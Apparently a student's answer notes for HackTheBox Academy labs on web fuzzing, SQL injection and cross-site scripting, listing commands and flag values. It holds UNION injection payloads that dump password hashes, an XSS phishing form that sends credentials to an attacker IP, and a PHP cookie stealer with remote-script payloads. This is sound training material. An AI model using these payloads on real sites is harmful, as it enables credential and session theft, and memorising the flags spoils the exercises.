ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$ip:$port/blog/FUZZ.php
# We obtain http://$ip:$port/blog/home.php
Results: HTB{bru73_f0r_c0mm0n_p455w0rd5}
Recursive fuzzing
Try to repeat what you learned so far to find more files/directories. One of them should give you a flag. What is the content of the flag?.
ffuf -recursion -recursion-depth 1 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://$ip:$port/FUZZ -e .php
### We obtain http://$ip:$port/forum/flag.php and the flag is there.
Results: HTB{fuzz1n6_7h3_w3b!}
Domain Fuzzing
Subdomain fuzzing
Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it?.
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.inlanefreight.com/
Results: customer.inlanefreight.com
Filtering results
Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get?.
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:$port -H 'Host: FUZZ.academy.htb' -fs 986
Results: test.academy.htb
Parameter fuzzing
Parameter fuzzing - GET
Using what you learned in this section, run a parameter fuzzing scan on this page. what is the parameter accepted by this webpage?.
# We enumerate:
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:$por/admin/admin.php?FUZZ=key -fs 798
# And we obtain user. We enter http://admin.academy.htb:30721/admin/admin.php?user=key and obtain the message, You don't have access to read the flag. We enter http://admin.academy.htb:30721/admin/admin.php?user=admin and obtain the message "This method is deprecated"
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:$port/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
Results: user
Value fuzzing
Try to create the 'ids.txt' wordlist, identify the accepted value with a fuzzing scan, and then use it in a 'POST' request with 'curl' to collect the flag. What is the content of the flag?.
# First create a list of 1000 id values, from 1 to 1000
for i in $(seq 1 1000); do echo $i >> ids.txt; done
# Now, fuzz
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:$port/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
# it will return the payload 73. Now with curl:
curl http://admin.academy.htb:$port/admin/admin.php -X POST -d 'id=73' -H 'Content-Type: application/x-www-form-urlencoded'
Results: HTB{p4r4m373r_fuzz1n6_15_k3y!}
Skills assessment - Web fuzzing
Run a sub-domain/vhost fuzzing scan on '*.academy.htb' for the IP shown above. What are all the sub-domains you can identify? (Only write the sub-domain name).
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:$port/ -H 'Host: FUZZ.academy.htb' -fs 985
Results: test archive faculty
Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains?.
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://academy.htb:$port/indexFUZZ -H 'Host:test.academy.htb'
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://academy.htb:$port/indexFUZZ -H 'Host:archive.academy.htb'
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://academy.htb:$port/indexFUZZ -H 'Host:faculty.academy.htb'
Results: php phps php7
** One of the pages you will identify should say 'You don't have access!'. What is the full page URL?.**
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:$port/FUZZ -recursion -recursion-depth 1 -e .php,.php7,.phps -fc 403
Results: http://faculty.academy.htb:PORT/courses/linux-security.php7
** In the page from the previous question, you should be able to find multiple parameters that are accepted by the page. What are they?.**
# First, we fuzz parameters:
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:$port/courses/linux-security.php7?FUZZ=1 -fs 774
# We obtain user. We enter http://faculty.academy.htb:$port/courses/linux-security.php7?user=admin in the browsers. When accessing, we read the message "This method is no longer used." printed on the screen. So we try to FUZZ the value of the user parameter with the POST method
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u "http://faculty.academy.htb:$port/courses/linux-security.php7" -X POST -d "FUZZ=key" -H 'Content-Type: application/x-www-form-urlencoded' -fs 774
Results: user, username
Try fuzzing the parameters you identified for working values. One of them should return a flag. What is the content of the flag?.
ffuf -w /usr/share/seclists/Usernames/Names/names.txt:FUZZ -u "http://faculty.academy.htb:$port/courses/linux-security.php7" -X POST -d "username=FUZZ" -H 'Content-Type: application/x-www-form-urlencoded' -fs 781
# This returns 'harry'. Now we curl that url
curl "http://faculty.academy.htb:$port/courses/linux-security.php7" -X POST -d "username=harry"
Results: HTB{w3b_fuzz1n6_m4573r}
Login Brute Forcing
SQL Injection Fundamentals
MySQL
Authenticate to 83.136.255.194:55762 with user "root" and password "password" Connect to the database using the MySQL client from the command line. Use the 'show databases;' command to list databases in the DBMS. What is the name of the first database?
Results: employees
What is the department number for the 'Development' department?
Results: d005
What is the last name of the employee whose first name starts with "Bar" AND who was hired on 1990-01-01?
mysql -u root -h $ip -P $port -ppassword
show databases;
show tables;
select * from employees WHERE first_name LIKE 'Bar%' AND hire_date='1990-01-01';
Results: Mitchem
In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?
mysql -u root -h $ip -P $port -ppassword
SELECT * from titles WHERE (emp_no > 10000 OR title NOT LIKE 'Engineer');
Results: 654
SQL Injections
Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?
Results: 202a1d1a8b195d5e9a57e434cc16000c
Login as the user with the id 5 to get the flag.
Results: cdad9ecdf6f14b45ff5c4de32909caec
Authenticate to $ip:$port
with user "root" and password "password". Connect to the above MySQL server with the 'mysql' tool, and find the number of records returned when doing a 'Union' of all records in the 'employees' table and all records in the 'departments' table.
mysql -u root -h $ip -P $port -ppassword
show databases;
use employees;
describe employees;
describe departments;
SELECT dept_no,dept_name,NULL,NULL,NULL,NULL from departments UNION select * FROM employees;
Results: 663
Use a Union injection to get the result of 'user()'
' ORDER BY 1;#
' ORDER BY 2;#
' ORDER BY 3;#
' ORDER BY 4;#
' ORDER BY 5;#
# With 5 columns it will return an error, so it has 4 columns
# Check out which ones are printed with
' UNION select 1,2,3,4;#
# The UI will give you columns 2,3,4. Inject the code there
' UNION select 1,user(),@@version,4;#
Results: root@localhost
Exploitation
What is the password hash for 'newuser' stored in the 'users' table in the 'ilfreight' database?
# This comes from the previous exercise...
# Get all the columns from the table users
cn' UNION select 1,column_name,3,4 from information_schema.columns WHERE table_name='users'-- -
# Get id, username and password from table users:
cn' UNION select 1,id,username,password from users-- -
Port Code | Port City | Port Volume | ||||||
---|---|---|---|---|---|---|---|---|
1 | admin | 392037dbba51f692776d6cefb6dd546d | ||||||
2 | newuser | 9da2c9bcdf39d8610954e0e11ea8f45f |
Results: 9da2c9bcdf39d8610954e0e11ea8f45f
Cross-Site Scripting (XSS)
XSS Basics
Stored XSS
To get the flag, use the same payload we used above, but change its JavaScript code to show the cookie instead of showing the url.
Results: HTB{570r3d_f0r_3v3ry0n3_70_533}
Reflected XSS
To get the flag, use the same payload we used above, but change its JavaScript code to show the cookie instead of showing the url.
Results: HTB{r3fl3c73d_b4ck_2_m3}
DOM XSS
To get the flag, use the same payload we used above, but change its JavaScript code to show the cookie instead of showing the url.
Results:
XSS Discovery
Utilize some of the techniques mentioned in this section to identify the vulnerable input parameter found in the above server. What is the name of the vulnerable parameter?
# Enter http://$ip:$port/?fullname=lolo&username=lala&password=lalala&email=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Results: email
What type of XSS was found on the above server? "name only"
Results: Reflected
XSS Attacks
Phishing
Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag.
Creating a valid payload in http://10.129.148.221/phishing/index.php?url= This would be the payload:
\`/'</script/--!><h3>Please login to continue</h3><form action=http://10.10.14.198> <input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>
This would be the link generated:
http://10.129.148.221/phishing/index.php?url=%5C%60%2F%27%3C%2Fscript%2F--%21%3E%3Ch3%3EPlease+login+to+continue%3C%2Fh3%3E%3Cform+action%3Dhttp%3A%2F%2F10.10.14.198%3E++++%3Cinput+type%3D%22username%22+name%3D%22username%22+placeholder%3D%22Username%22%3E%3Cinput+type%3D%22password%22+name%3D%22password%22+placeholder%3D%22Password%22%3E%3Cinput+type%3D%22submit%22+name%3D%22submit%22+value%3D%22Login%22%3E%3C%2Fform%3E
Starting a netcat listener:
Visiting http://10.129.148.221/phishing/send.php and entering the link generated.
In the netcat listener we obtain:
listening on [any] 80 ...
connect to [10.10.14.198] from (UNKNOWN) [10.129.148.221] 46802
GET /?username=admin&password=p1zd0nt57341myp455&submit=Login HTTP/1.1
Host: 10.10.14.198
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: HTBXSS/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.129.148.221/
Accept-Encoding: gzip, deflate
Accept-Language: en-US
We use the creds for accessing to /phishing/login.php and grabbing the flag
Results: HTB{r3f13c73d_cr3d5_84ck_2_m3}
Session Hijacking
Try to repeat what you learned in this section to identify the vulnerable input field and find a working XSS payload, and then use the 'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to get the flag.
Create a file index.php in the attacker machine:
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
Have a php server listening:
Enter $ip/hijacking and enter this payload in every field. Use the field name (username, name, surname...) as <custom.name>
when different payloads:
If successful, you will see a connection in your php server like this:
Then, profile
would be the vulnerable input (parameter imgurl
). The URL:
http://VICTIMIP/hijacking/?fullname=Lala%20lalasurname%2Ffullname%3C%2Fscript%3E&username=%22%3E%3Cscript+src%3Dhttp%3A%2F%2FAttackerIP%2Fusername%3C%2Fscript%3E&password=lala&email=lala%40gmail.com&imgurl=%22%3E%3Cscript%20src=%22http://AttackerIP/lala.js%22%3E%3C/script%3E
Beside the index.php, have a lala.js in your php server:
Run your php server:
Now, we can change the URL in the XSS payload we found earlier to use lala.js
. For instance:
You will log the following activity in your php server:
Results: HTB{4lw4y5_53cur3_y0ur_c00k135}
XSS Prevention
Skills Assessment
What is the value of the 'flag' cookie?
Enter payload in all form fields. The vulnerable one is website
with the payload
I have a php server running, with this index.php:
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
I know that it is the parameter webserver
because of this:
Now, I have also this file lala.js in my server:
And in my php server:
Results: HTB{cr055_5173_5cr1p71n6_n1nj4}
File Inclusion
File Upload Attacks
Command Injections
Web Attacks
Attacking Common Applications
Linux Privilege Escalation
Windows Privilege Escalation
Documentation & Reporting
Attacking Enterprise Networks
Question
Results:
Last update: 2024-11-17 Created: May 31, 2024 18:03:27